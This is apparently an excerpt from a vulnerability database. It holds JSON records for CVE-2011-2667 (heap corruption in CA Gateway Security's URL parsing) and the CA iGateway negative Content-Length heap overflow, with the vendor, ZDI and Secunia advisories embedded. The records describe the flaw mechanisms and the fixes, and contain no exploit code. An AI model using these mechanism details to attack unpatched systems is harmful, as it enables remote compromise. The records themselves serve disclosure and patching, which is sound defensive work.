"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:gateway_security:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:total_defense:r12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrea Micalizzi aka rgod",
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
],
"trust": 1.6
},
"cve": "CVE-2011-2667",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2011-2667",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.5,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-50612",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-2667",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2011-2667",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201107-323",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-50612",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Icihttp.exe in CA Gateway Security for HTTP, as used in CA Gateway Security 8.1 before 8.1.0.69 and CA Total Defense r12, does not properly parse URLs, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and daemon crash) via a malformed request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Icihttp.exe module (CA Gateway Security for HTTP), which responds to incoming HTTP requests on port 8080. Due to a flawed copy-loop algorithm in the URL parsing routine, it is possible for a remote unauthenticated user to cause an exploitable heap corruption condition. This could result in the execution of arbitrary code under the context of the Gateway Security service. Computer Associates Total Defense and Gateway Security are prone to a remote code-execution vulnerability. \nSuccessfully exploiting this issue will allow attackers to execute arbitrary code with elevated privileges, completely compromising affected computers. \nTotal Defense r12 and Gateway Security 8.1 are vulnerable; other versions may also be affected. CA has issued an update that\nresolves the vulnerability. \n\nThe vulnerability, CVE-2011-2667, occurs due to insufficient bounds\nchecking that can result in a memory overwrite on the heap. By\nsending a malformed request, an attacker can overwrite a sensitive\nportion of heap memory, which can potentially result in server\ncompromise. If the version displayed is less than 8.1.0.69,\nthe installation is vulnerable. \n\nSolution\n\nGateway Security r8.1:\nApply fix RO32642\n\nAlternatively, update to Gateway Security 9.0 available from the CA\nsupport site. \n(url line wraps)\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17\n7782\n\nRegards,\n\nKevin Kotas\nCA Product Vulnerability Response Team\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQEVAwUBTicU8pI1FvIeMomJAQHDpQgAlZ5TqT9B+I4zd20wzh8GhajqGb8BIuxo\nsCToQG5jq+kUX1QMnL+MVv4A0nR2o2P8cgxEhNtpEOyHnTeKvBuT//ALBpQgjYQ3\nlMY3tRNrqEo1BAD9x/GqVp/xIBiaqkL80bt0BXmvxxhKblSX30mUA8D+v8P+DPrO\neR+VEB7feWQ9LaqjIeEa5t8P5/TxuA+XNv0EdWtU7OAFc/IzXiu91XF++I+UJs3V\nl9Kvdj7x7JXyqZXc3943eUR/zqbxXO2/h/67Gj+N5ub1S4TBkPuoUMcPQ3o3l2WZ\n75HcRT6AIHZ6shTbD20TCl1LUs4uKmJYc41kfbCEX3BsU12WbbV+zw==\n=w+9B\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. ----------------------------------------------------------------------\n\nThe Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way. \n\nRead more and request a free trial:\nhttp://secunia.com/products/corporate/vim/\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Gateway Security URL Parsing Vulnerability\n\nSECUNIA ADVISORY ID:\nSA45332\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/45332/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45332\n\nRELEASE DATE:\n2011-07-22\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/45332/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/45332/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45332\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in CA Gateway Security, which can\nbe exploited by malicious people to compromise a vulnerable system. This can be\nexploited to corrupt heap memory via specially crafted HTTP requests\nsent to TCP 8080. \n\nThe vulnerability is reported in versions prior to 8.1.0.69. \n\nSOLUTION:\nApply patch RO32642. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nAndrea Micalizzi aka rgod via ZDI. \n\nORIGINAL ADVISORY:\nCA:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}\n\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-237/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\n-- Vendor Response:\nCA states:\nCA20110720-01: Security Notice for CA Gateway Security and Total\nDefense\n\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7b5E404992-6B58-4C44-A29D-027D05B6285D%7d\n\n-- Disclosure Timeline:\n2011-01-21 - Vulnerability reported to vendor\n2011-07-20 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Andrea Micalizzi aka rgod\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-50612",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50612"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-2667",
"trust": 3.7
},
{
"db": "ZDI",
"id": "ZDI-11-237",
"trust": 2.9
},
{
"db": "BID",
"id": "48813",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "45332",
"trust": 1.9
},
{
"db": "SECTRACK",
"id": "1025813",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1025812",
"trust": 1.7
},
{
"db": "SREASON",
"id": "8316",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1017",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "103195",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "103181",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-50612",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "103256",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"id": "VAR-201107-0229",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-50612"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:57:59.277000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA20110720-01: Security Notice for CA Gateway Security and Total Defense",
"trust": 1.5,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7b5e404992-6b58-4c44-a29d-027d05b6285d%7d"
},
{
"title": "CA Total Defense and Gateway Security Fixes for remote code execution vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=147280"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-237/"
},
{
"trust": 1.9,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7b5e404992-6b58-4c44-a29d-027d05b6285d%7d"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/48813"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/518935/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/518934/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1025812"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1025813"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/45332"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/8316"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68736"
},
{
"trust": 1.0,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={5e404992-6b58-4c44-a29d-027d05b6285d}"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2667"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2667"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "https://support.ca.com/irj/portal/anonymous/solndtls?aparno=ro32642\u0026os=nt\u0026actionid=3"
},
{
"trust": 0.2,
"url": "http://secunia.com/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2667"
},
{
"trust": 0.2,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=17"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={5"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45332/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45332"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45332/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-237"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-20T00:00:00",
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"date": "2011-07-28T00:00:00",
"db": "VULHUB",
"id": "VHN-50612"
},
{
"date": "2011-07-20T00:00:00",
"db": "BID",
"id": "48813"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"date": "2011-07-21T00:35:53",
"db": "PACKETSTORM",
"id": "103195"
},
{
"date": "2011-07-21T07:04:10",
"db": "PACKETSTORM",
"id": "103256"
},
{
"date": "2011-07-20T18:35:17",
"db": "PACKETSTORM",
"id": "103181"
},
{
"date": "2011-07-28T22:55:02.390000",
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-20T00:00:00",
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-50612"
},
{
"date": "2011-07-20T00:00:00",
"db": "BID",
"id": "48813"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"date": "2023-11-07T02:07:44.260000",
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Gateway Security and CA Total Defense Used in CA Gateway Security for HTTP of Icihttp.exe Vulnerable to arbitrary code execution",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
],
"trust": 0.6
}
}
VAR-200512-0273
Vulnerability from variot - Updated: 2023-12-18 13:54Heap-based buffer overflow in the iGateway service for various Computer Associates (CA) iTechnology products, in iTechnology iGateway before 4.0.051230, allows remote attackers to execute arbitrary code via an HTTP request with a negative Content-Length field. The attacker can trigger the vulnerability by supplying a negative HTTP Content-Length value and a large URI to the service. A successful attack can result in corrupting process memory and the execution of arbitrary code with SYSTEM privileges on Windows platforms. The vendor has reported that this issue triggers only a denial-of-service condition on other platforms. Products containing iGateway 4.0.051230 are vulnerable to this issue. iTechnology is an integrated technology that provides standard Web service interfaces for third-party products. There is a heap overflow vulnerability in iTechnology's processing of HTTP request headers. iGateway service monitors standard HTTP or SSL communication on port 5250. The service does not properly handle negative HTTP Content-Length fields. iGateway parses the Content-length field value of the HTTP request and uses this value directly in the malloc() heap allocation call, so if a negative value is provided, the heap allocation call will return a small buffer. After the malloc() call, memcpy the provided URI to the allocated buffer and overwrite it to the heap.
TITLE: CA Products iGateway Service Content-Length Buffer Overflow
SECUNIA ADVISORY ID: SA18591
VERIFY ADVISORY: http://secunia.com/advisories/18591/
CRITICAL: Moderately critical
IMPACT: System access
WHERE:
From local network
SOFTWARE: BrightStor ARCserve Backup 11.x http://secunia.com/product/312/ BrightStor ARCserve Backup 11.x (for Windows) http://secunia.com/product/3099/ BrightStor ARCserve Backup 9.x http://secunia.com/product/313/ BrightStor ARCserve Backup for Laptops & Desktops 11.x http://secunia.com/product/5906/ BrightStor Enterprise Backup 10.x http://secunia.com/product/314/ BrightStor Process Automation Manager 11.x http://secunia.com/product/5908/ BrightStor Storage Resource Manager 11.x http://secunia.com/product/5909/ BrightStor Storage Resource Manager 6.x http://secunia.com/product/5910/ CA Advantage Data Transformer 2.x http://secunia.com/product/5904/ CA AllFusion Harvest Change Manager 7.x http://secunia.com/product/5905/ CA BrightStor Portal 11.x http://secunia.com/product/5577/ CA BrightStor SAN Manager 11.x http://secunia.com/product/5576/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Audit 1.x http://secunia.com/product/5911/ CA eTrust Audit 8.x http://secunia.com/product/5912/ CA eTrust Identity Minder 8.x http://secunia.com/product/5913/ CA Unicenter Service Fulfillment 2.x http://secunia.com/product/5942/ eTrust Secure Content Manager (SCM) http://secunia.com/product/3391/
DESCRIPTION: Erika Mendoza has reported a vulnerability in various CA products, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to a boundary error in the handling of HTTP data in the iGateway component.
SOLUTION: Update the iGateway component to version 4.0.051230 or later. ftp://ftp.ca.com/pub/iTech/downloads/
PROVIDED AND/OR DISCOVERED BY: Erika Mendoza
ORIGINAL ADVISORY: Computer Associates: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778
iDEFENSE: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=376
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Please see below for important changes to CAID 33778 (aka CVE-2005-3653; OSVDB 22688; X-Force 24269; SecurityTracker Alert ID 1015526). Changelog is near end of advisory.
Regards, Ken Williams
Title: CAID 33778 - CA iGateway Content-Length Buffer Overflow Vulnerability [v1.1]
CA Vulnerability ID: 33778
CA Advisory Date: 2006-01-23 Updated Advisory [v1.1]: 2006-01-26
Discovered By: Erika Mendoza reported this issue to iDefense.
Mitigating Factors: None.
Severity: CA has given this vulnerability a Medium risk rating.
Affected Technologies: Please note that the iGateway component is not a product, but rather a common component that is included with multiple products. The iGateway component is included in the following CA products, which are consequently potentially vulnerable.
Affected Products:
BrightStor ARCserve Backup r11.5 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup for Windows r11 BrightStor Enterprise Backup 10.5 BrightStor ARCserve Backup v9.01 BrightStor ARCserve Backup Laptop & Desktop r11.1 BrightStor ARCserve Backup Laptop & Desktop r11 BrightStor Process Automation Manager r11.1 BrightStor SAN Manager r11.1 BrightStor SAN Manager r11.5 BrightStor Storage Resource Manager r11.5 BrightStor Storage Resource Manager r11.1 BrightStor Storage Resource Manager 6.4 BrightStor Storage Resource Manager 6.3 BrightStor Portal 11.1
Note to BrightStor Storage Resource Manager and BrightStor Portal users: In addition to the application servers where these products are installed, all hosts that have iSponsors deployed to them for managing applications like Veritas Volume Manager and Tivoli TSM are also affected by this vulnerability.
eTrust Products: eTrust Audit 1.5 SP2 (iRecorders and ARIES) eTrust Audit 1.5 SP3 (iRecorders and ARIES) eTrust Audit 8.0 (iRecorders and ARIES) eTrust Admin 8.1 eTrust Identity Minder 8.0 eTrust Secure Content Manager (SCM) R8 eTrust Integrated Threat Management (ITM) R8 eTrust Directory, R8.1 (Web Components Only)
Unicenter Products: Unicenter CA Web Services Distributed Management R11 Unicenter AutoSys JM R11 Unicenter Management for WebLogic / Management for WebSphere R11 Unicenter Service Delivery R11 Unicenter Service Level Management (USLM) R11 Unicenter Application Performance Monitor R11 Unicenter Service Desk R11 Unicenter Service Desk Knowledge Tools R11 Unicenter Asset Portfolio Management R11 Unicenter Service Metric Analysis R11 Unicenter Service Catalog/Assure/Accounting R11 Unicenter MQ Management R11 Unicenter Application Server Management R11 Unicenter Web Server Management R11 Unicenter Exchange Management R11
Affected platforms: AIX, HP-UX, Linux Intel, Solaris, and Windows
Status and Recommendation: Customers with vulnerable versions of the iGateway component should upgrade to the current version of iGateway (4.0.051230 or later), which is available for download from the following locations: http://supportconnect.ca.com/ ftp://ftp.ca.com/pub/iTech/downloads/
Determining the version of iGateway: To determine the version numbers of the iGateway components:
Go to the igateway directory:
On windows, this is %IGW_LOC% Default path for v3.: C:\Program Files\CA\igateway Default path for v4.: C:\Program Files\CA\SharedComponents\iTechnology
On unix, Default path for v3.: /opt/CA/igateway Default path for v4.: the install directory path is contained in opt/CA/SharedComponents/iTechnology.location. The default path is /opt/CA/SharedComponents/iTechnology
Look at the element in igateway.conf.
